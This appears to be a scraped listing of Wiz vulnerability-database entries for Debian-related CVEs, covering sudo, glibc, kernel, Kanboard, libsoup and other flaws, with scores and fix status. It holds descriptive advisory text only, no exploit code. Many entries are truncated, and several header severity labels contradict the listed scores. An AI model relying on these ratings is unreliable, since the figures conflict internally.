Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 09, 2025
Echo Has Fix Added at: Dec 09, 2025
## CVE-2026-1767: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-1767 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
[Heap Buffer Overflow in GNOME localsearch MP3 Extractor]
Source : NVD
Published February 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tracker-miners
tracker-miners-lang
Sources
NVD
Debian 11 No Fix Added at: Feb 04, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Feb 04, 2026
Debian 14 Has Fix Added at: Feb 04, 2026
Echo No Fix Added at: Feb 04, 2026
Red Hat 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 04, 2026
Ubuntu 22.04, 24.04, 25.10 Severity MEDIUM Has Fix
## CVE-2025-62602: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2025-62602 Impact, Exploitability, and Mitigation Steps" · CVSS 1.7 [LOW]
PID_IDENTITY_TOKEN
PID_PERMISSIONS_TOKEN
readOctetVector
vecsize
readData
length
vecsize
length
Source : NVD
Score 1.7
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
Debian 14 Severity HIGH No Fix Added at: Nov 19, 2025
Echo Severity HIGH No Fix Added at: Nov 19, 2025
## CVE-2026-35535: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-35535 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
In Sudo through 1.9.17p2 before 3e474c2, a failure of a setuid, setgid, or setgroups call, during a privilege drop before running the mailer, is not a fatal error and can lead to privilege escalation.
Source : NVD
Score 7.4
Published April 3, 2026
Severity HIGH
CNA Score 7.4
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
seal-sudo
sudo
Sources
NVD
Debian 11 Severity HIGH No Fix Added at: Apr 03, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Apr 03, 2026
Debian 14 Severity HIGH H
## CVE-2026-4046: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-4046 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application.
This vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them.
Source : NVD
Score 7.5
Published March 30, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
glibc-langp
## CVE-2023-53900: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2023-53900 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
Spip 4.1.10 contains a file upload vulnerability that allows attackers to upload malicious SVG files with embedded external links. Attackers can trick administrators into clicking a crafted SVG logo that redirects to a potentially dangerous URL through improper file upload filtering.
Source : NVD
Published December 16, 2025
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
Sources
NVD
Debian 11, 13, 14 Severity MEDIUM No Fix Added at: Jan 13, 2026
Echo Severity MEDIUM No
## CVE-2026-4948: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-4948 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
A flaw was found in firewalld. A local unprivileged user can exploit this vulnerability by mis-authorizing two runtime D-Bus (Desktop Bus) setters, setZoneSettings2 and setPolicySettings. This mis-authorization allows the user to modify the runtime firewall state without proper authentication, leading to unauthorized changes in network security configurations.
Source : NVD
Score 5.5
Published March 27, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
firewal
## CVE-2026-0396: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-0396 Impact, Exploitability, and Mitigation Steps" · CVSS 3.1 [LOW]
An attacker might be able to inject HTML content into the internal web dashboard by sending crafted DNS queries to a DNSdist instance where domain-based dynamic rules have been enabled via either DynBlockRulesGroup:setSuffixMatchRule or DynBlockRulesGroup:setSuffixMatchRuleFFI.
Source : NVD
Score 3.1
Published March 31, 2026
Severity LOW
CNA Score 3.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
NVD
Debian 11, 12, 13 Severity LOW No Fix Added at: Apr 02, 2026
Debian 14 Severity
## CVE-2026-27894: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-27894 Impact, Exploitability, and Mitigation Steps" · CVSS 8.8 [HIGH]
LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. Prior to version 9.5, a local file inclusion was detected in the PDF export that allows users to include local PHP files and this way execute code. In combination with GHSA-88hf-2cjm-m9g8 this allows arbitrary code execution. Users need to login to LAM to exploit this vulnerability. Version 9.5 fixes the issue. Although upgrading is recommended, a workaround would be to make /var/lib/ldap-account-manager/config read-only for the web-server user and delete the PDF profile files (making PDF exports impossible).
Source : NVD
Score 8.8
Published March 18, 2026
Severity HIGH
## CVE-2026-3632: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-3632 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
A flaw was found in libsoup, a library used by applications to send network requests. This vulnerability occurs because libsoup does not properly validate hostnames, allowing special characters to be injected into HTTP headers. A remote attacker could exploit this to perform HTTP smuggling, where they can send hidden, malicious requests alongside legitimate ones. In certain situations, this could lead to Server-Side Request Forgery (SSRF), enabling an attacker to force the server to make unauthorized requests to other internal or external systems. The impact is low, as SoupServer is not actually used in internet infrastructure.
Source : NVD
Score 5.5
Published March 17, 2026
Severity MEDIUM
CNA Score 3.9
## CVE-2026-35094: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-35094 Impact, Exploitability, and Mitigation Steps" · CVSS 3.3 [LOW]
A flaw was found in libinput. An attacker capable of deploying a Lua plugin file in specific system directories can exploit a dangling pointer vulnerability. This occurs when a garbage collection cleanup function is called, leaving a pointer that can then be printed to system logs. This could potentially expose sensitive data if the memory location is re-used, leading to information disclosure. For this exploit to work, Lua plugins must be enabled in libinput and loaded by the compositor.
Source : NVD
Score 3.3
Published April 1, 2026
Severity LOW
CNA Score 3.3
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2026-23308: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-23308 Impact, Exploitability, and Mitigation Steps"
In the Linux kernel, the following vulnerability has been resolved:
pinctrl: equilibrium: fix warning trace on load
The callback functions 'eqbr_irq_mask()' and 'eqbr_irq_ack()' are also
called in the callback function 'eqbr_irq_mask_ack()'. This is done to
avoid source code duplication. The problem is that the function
'eqbr_irq_mask()' also calls the gpiolib function 'gpiochip_disable_irq()'.
This generates the following warning trace in the log for every gpio on
load.
[ 6.088111] ------------[ cut here ]------------
[ 6.092440] WARNING: CPU: 3 PID: 1 at drivers/gpio/gpiolib.c:3810 gpiochip_disable_irq+0x39/0x50
[ 6.097847] Modules linked in:
[ 6.097847] CPU: 3 UID: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.12
## CVE-2025-71242: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2025-71242 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
SPIP before 4.3.6, 4.2.17, and 4.1.20 allows unauthorized content disclosure in the private area. The application does not properly check authorization when displaying content of articles and sections (rubriques) in AJAX-loaded fragments, allowing an authenticated attacker to access restricted content. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
Score 5.3
Published February 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
## CVE-2025-71074: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2025-71074 Impact, Exploitability, and Mitigation Steps" · CVSS 4.7 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
functionfs: fix the open/removal races
ffs_epfile_open() can race with removal, ending up with file->private_data
pointing to freed object.
There is a total count of opened files on functionfs (both ep0 and
dynamic ones) and when it hits zero, dynamic files get removed.
Unfortunately, that removal can happen while another thread is
in ffs_epfile_open(), but has not incremented the count yet.
In that case open will succeed, leaving us with UAF on any subsequent
read() or write().
The root cause is that ffs->opened is misused; atomic_dec_and_test() vs.
atomic_add_return() is not a good idea, when object remains visible all
along.
To untangle that
## CVE-2026-31397: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-31397 Impact, Exploitability, and Mitigation Steps"
In the Linux kernel, the following vulnerability has been resolved:
mm/huge_memory: fix use of NULL folio in move_pages_huge_pmd()
move_pages_huge_pmd() handles UFFDIO_MOVE for both normal THPs and huge
zero pages. For the huge zero page path, src_folio is explicitly set to
NULL, and is used as a sentinel to skip folio operations like lock and
rmap.
In the huge zero page branch, src_folio is NULL, so folio_mk_pmd(NULL,
pgprot) passes NULL through folio_pfn() and page_to_pfn(). With
SPARSEMEM_VMEMMAP this silently produces a bogus PFN, installing a PMD
pointing to non-existent physical memory. On other memory models it is a
NULL dereference.
Use page_folio(src_page) to obtain the valid huge zero folio from the
page
## CVE-2026-23460: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-23460 Impact, Exploitability, and Mitigation Steps"
In the Linux kernel, the following vulnerability has been resolved:
net/rose: fix NULL pointer dereference in rose_transmit_link on reconnect
syzkaller reported a bug [1], and the reproducer is available at [2].
ROSE sockets use four sk->sk_state values: TCP_CLOSE, TCP_LISTEN,
TCP_SYN_SENT, and TCP_ESTABLISHED. rose_connect() already rejects
calls for TCP_ESTABLISHED (-EISCONN) and TCP_CLOSE with SS_CONNECTING
(-ECONNREFUSED), but lacks a check for TCP_SYN_SENT.
When rose_connect() is called a second time while the first connection
attempt is still in progress (TCP_SYN_SENT), it overwrites
rose->neighbour via rose_get_neigh(). If that returns NULL, the socket
is left with rose->state == ROSE_STATE_1 but rose->neig
## CVE-2026-21879: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-21879 Impact, Exploitability, and Mitigation Steps" · CVSS 4.7 [MEDIUM]
Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below are vulnerable to an Open Redirect attack that allows malicious actors to redirect authenticated users to attacker-controlled websites. By crafting URLs such as //evil.com, attackers can bypass the filter_var($url, FILTER_VALIDATE_URL) validation check. This vulnerability could be exploited to conduct phishing attacks, steal user credentials, or distribute malware. The issue is fixed in version 1.2.49.
Source : NVD
Score 6.1
Published January 8, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
## CVE-2026-3196: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-3196 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
two potential OOB memory accesses in virtio-snd
Source : NVD
Published March 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
qemu
Sources
NVD
Debian 11 No Fix Added at: Mar 03, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 03, 2026
Debian 14 Has Fix Added at: Mar 03, 2026
Echo No Fix Added at: Mar 03, 2026
Ubuntu 24.04, 25.10 Severity MEDIUM No Fix Added at: Apr 02, 2026
## CVE-2026-0848: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-0848 Impact, Exploitability, and Mitigation Steps" · CVSS 10.0 [CRITICAL]
NLTK versions <=3.9.2 are vulnerable to arbitrary code execution due to improper input validation in the StanfordSegmenter module. The module dynamically loads external Java .jar files without verification or sandboxing. An attacker can supply or replace the JAR file, enabling the execution of arbitrary Java bytecode at import time. This vulnerability can be exploited through methods such as model poisoning, MITM attacks, or dependency poisoning, leading to remote code execution. The issue arises from the direct execution of the JAR file via subprocess with unvalidated classpath input, allowing malicious classes to execute when loaded by the JVM.
Source : NVD
Score 10
Published March 5, 2026
Severity CRITICAL
## CVE-2026-23264: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-23264 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
Revert "drm/amd: Check if ASPM is enabled from PCIe subsystem"
This reverts commit 7294863a6f01248d72b61d38478978d638641bee.
amdgpu_aspm
(cherry picked from commit 97a9689300eb2b393ba5efc17c8e5db835917080)
Source : NVD
Published March 18, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-hwe-6.17
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Mar 19, 2026
Echo Has Fix Added at: Mar 19, 2026
## CVE-2026-26079: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-26079 Impact, Exploitability, and Mitigation Steps" · CVSS 4.7 [MEDIUM]
Roundcube Webmail before 1.5.13 and 1.6 before 1.6.13 allows Cascading Style Sheets (CSS) injection, e.g., because comments are mishandled.
Source : NVD
Score 4.7
Published February 11, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Feb 12, 2026
Echo Severity MEDIUM Has Fix Added at: Feb 12, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM
## CVE-2026-25531: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-25531 Impact, Exploitability, and Mitigation Steps" · CVSS 5.4 [MEDIUM]
Kanboard is project management software focused on Kanban methodology. Prior to 1.2.50, the fix for CVE-2023-33968 is incomplete. The TaskCreationController::duplicateProjects() endpoint does not validate user permissions for target projects, allowing authenticated users to duplicate tasks into projects they cannot access. This vulnerability is fixed in 1.2.50.
Source : NVD
Score 4.3
Published February 13, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kanboard
## CVE-2026-5313: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-5313 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
A vulnerability has been found in Nothings stb up to 2.30. This issue affects the function stbi__gif_load_next in the library stb_image.h of the component GIF Decoder. Such manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 5.3
Published April 1, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.9
Exploitation Probability (EPSS) N/A
## CVE-2026-23339: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-23339 Impact, Exploitability, and Mitigation Steps" · CVSS 6.9 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: free skb on nci_transceive early error paths
nci_transceive() takes ownership of the skb passed by the caller,
but the -EPROTO, -EINVAL, and -EBUSY error paths return without
freeing it.
Due to issues clearing NCI_DATA_EXCHANGE fixed by subsequent changes
the nci/nci_dev selftest hits the error path occasionally in NIPA,
and kmemleak detects leaks:
unreferenced object 0xff11000015ce6a40 (size 640):
comm "nci_dev", pid 3954, jiffies 4295441246
hex dump (first 32 bytes):
6b 6b 6b 6b 00 a4 00 0c 02 e1 03 6b 6b 6b 6b 6b kkkk.......kkkkk
6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk
backtrace (crc 7c40cc2a):
kmem_cache_allo
## CVE-2023-54307: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2023-54307 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
ptp_qoriq: fix memory leak in probe()
Smatch complains that:
drivers/ptp/ptp_qoriq.c ptp_qoriq_probe()
warn: 'base' from ioremap() not released.
Fix this by revising the parameter from 'ptp_qoriq->base' to 'base'.
This is only a bug if ptp_qoriq_init() returns on the
first -ENODEV error path.
For other error paths ptp_qoriq->base and base are the same.
And this change makes the code more readable.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.8
## CVE-2018-25153: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2018-25153 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority as the reported issue does not constitute a security vulnerability and represents a minor, non-exploitable memory leak.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
barcode
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Dec 26, 2025
Echo Severity HIGH No Fix Added at: Dec 26, 2025
## CVE-2026-3634: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-3634 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
soup_message_headers_set_content_type()
Source : NVD
Score 6.5
Published March 17, 2026
Severity MEDIUM
CNA Score 3.9
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup3
libsoup3-devel
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 09, 2026
Echo Severity MEDIUM No Fix Added at: Mar 09, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Mar 08, 2026
Red Hat 7 Severity MEDIUM Has Fix Added at: Mar 08, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04,
## CVE-2026-23330: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-23330 Impact, Exploitability, and Mitigation Steps" · CVSS 6.9 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: complete pending data exchange on device close
In nci_close_device(), complete any pending data exchange before
closing. The data exchange callback (e.g.
rawsock_data_exchange_complete) holds a socket reference.
NIPA occasionally hits this leak:
unreferenced object 0xff1100000f435000 (size 2048):
comm "nci_dev", pid 3954, jiffies 4295441245
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
27 00 01 40 00 00 00 00 00 00 00 00 00 00 00 00 '..@............
backtrace (crc ec2b3c5):
__kmalloc_noprof+0x4db/0x730
sk_prot_alloc.isra.0+0xe4/0x1d0
sk_alloc+0x36/0x760
rawsock_create+0xd1/0x540
nfc_sock_crea
## CVE-2021-4456: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2021-4456 Impact, Exploitability, and Mitigation Steps" · CVSS 6.5 [MEDIUM]
Net::CIDR versions before 0.24 for Perl mishandle leading zeros in IP CIDR addresses, which may have unspecified impact.
addr2cidr
cidrlookup
cidrvalidate
addr2cidr
cidrlookup
Source : NVD
Score 6.5
Published February 27, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libnet-cidr-perl
perl-Net-CIDR
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Mar 02, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Mar 02, 2026
Echo Severity MEDI
## CVE-2025-63261: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2025-63261 Impact, Exploitability, and Mitigation Steps" · CVSS 7.8 [HIGH]
AWStats 8.0 is vulnerable to Command Injection via the open function
Source : NVD
Score 7.8
Published March 20, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
awstats
Sources
NVD
Debian 11 Severity HIGH Has Fix Added at: Mar 21, 2026
Debian 12, 13, 14 Severity LOW No Fix Added at: Mar 21, 2026
Echo Severity HIGH No Fix Added at: Mar 21, 2026
## CVE-2025-67479: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2025-67479 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
Vulnerability in Wikimedia Foundation MediaWiki, Wikimedia Foundation Cite. This vulnerability is associated with program files includes/Parser/CoreParserFunctions.Php, includes/Parser/Sanitizer.Php.
This issue affects MediaWiki: from * before 1.39.14, 1.43.4, 1.44.1; Cite: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
## CVE-2025-71176: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2025-71176 Impact, Exploitability, and Mitigation Steps" · CVSS 6.8 [MEDIUM]
pytest through 9.0.2 on UNIX relies on directories with the /tmp/pytest-of-{user} name pattern, which allows local users to cause a denial of service or possibly gain privileges.
Source : NVD
Score 6.8
Published January 22, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python3.12-pytest
python39-pytest
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Jan 23, 2026
Echo Severity MEDIUM No Fix Added at: Jan 23, 2026
Red Hat 7, 8, 9, 10
## CVE-2022-50813: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2022-50813 Impact, Exploitability, and Mitigation Steps" · CVSS 5.3 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
drivers: mcb: fix resource leak in mcb_probe()
When probe hook function failed in mcb_probe(), it doesn't put the device.
Compiled test only.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-aws-hwe
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 31, 2025
Echo Has Fix Added at: Dec 31, 2025
Ubuntu 14.04, 22.04 Severity MEDIUM Has Fix Added at
## CVE-2026-21881: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-21881 Impact, Exploitability, and Mitigation Steps" · CVSS 9.1 [CRITICAL]
Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below are vulnerable to a critical authentication bypass when REVERSE_PROXY_AUTH is enabled. The application blindly trusts HTTP headers for user authentication without verifying the request originated from a trusted reverse proxy. An attacker can impersonate any user, including administrators, by simply sending a spoofed HTTP header. This issue is fixed in version 1.2.49.
Source : NVD
Score 9.1
Published January 8, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2026-23446: Linux Debian vulnerability analysis and mitigation
Wiz, "CVE-2026-23446 Impact, Exploitability, and Mitigation Steps" · CVSS 6.9 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
net: usb: aqc111: Do not perform PM inside suspend callback
syzbot reports "task hung in rpm_resume"
This is caused by aqc111_suspend calling
the PM variant of its write_cmd routine.
The simplified call trace looks like this:
rpm_suspend()
usb_suspend_both() - here udev->dev.power.runtime_status == RPM_SUSPENDING
aqc111_suspend() - called for the usb device interface
aqc111_write32_cmd()
usb_autopm_get_interface()
pm_runtime_resume_and_get()
rpm_resume() - here we call rpm_resume() on our parent
rpm_resume() - Here we wait for a status change that will never happen.
At this point we block another task which holds
rtnl_lock and locks up the whole
## CVE-2025-67481 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files resources/src/mediawiki.JqueryMsg/mediawiki.JqueryMsg.Js.
This issue affects MediaWiki: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: D
## CVE-2026-4750 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
Out-of-bounds Read vulnerability in fabiangreffrath woof. This issue affects woof: before woof_15.3.0.
Source : NVD
Score 9.1
Published March 24, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
woof-doom
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 24, 2026
Debian 14 Severity CRITICAL Has Fix Added at: Mar 24, 2026
Echo Severity CRITICAL No Fix Added at: Mar 24, 2026
## CVE-2026-23314 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
regulator: bq257xx: Fix device node reference leak in bq257xx_reg_dt_parse_gpio()
In bq257xx_reg_dt_parse_gpio(), if it fails to get subchild, it returns
without calling of_node_put(child), causing the device node reference
leak.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
Sources
NVD
Debian 14 Has Fix Added at: Mar 26, 2026
## CVE-2025-61657 [MEDIUM, CVSS 5.3] :
Linux Debian vulnerability analysis and mitigation
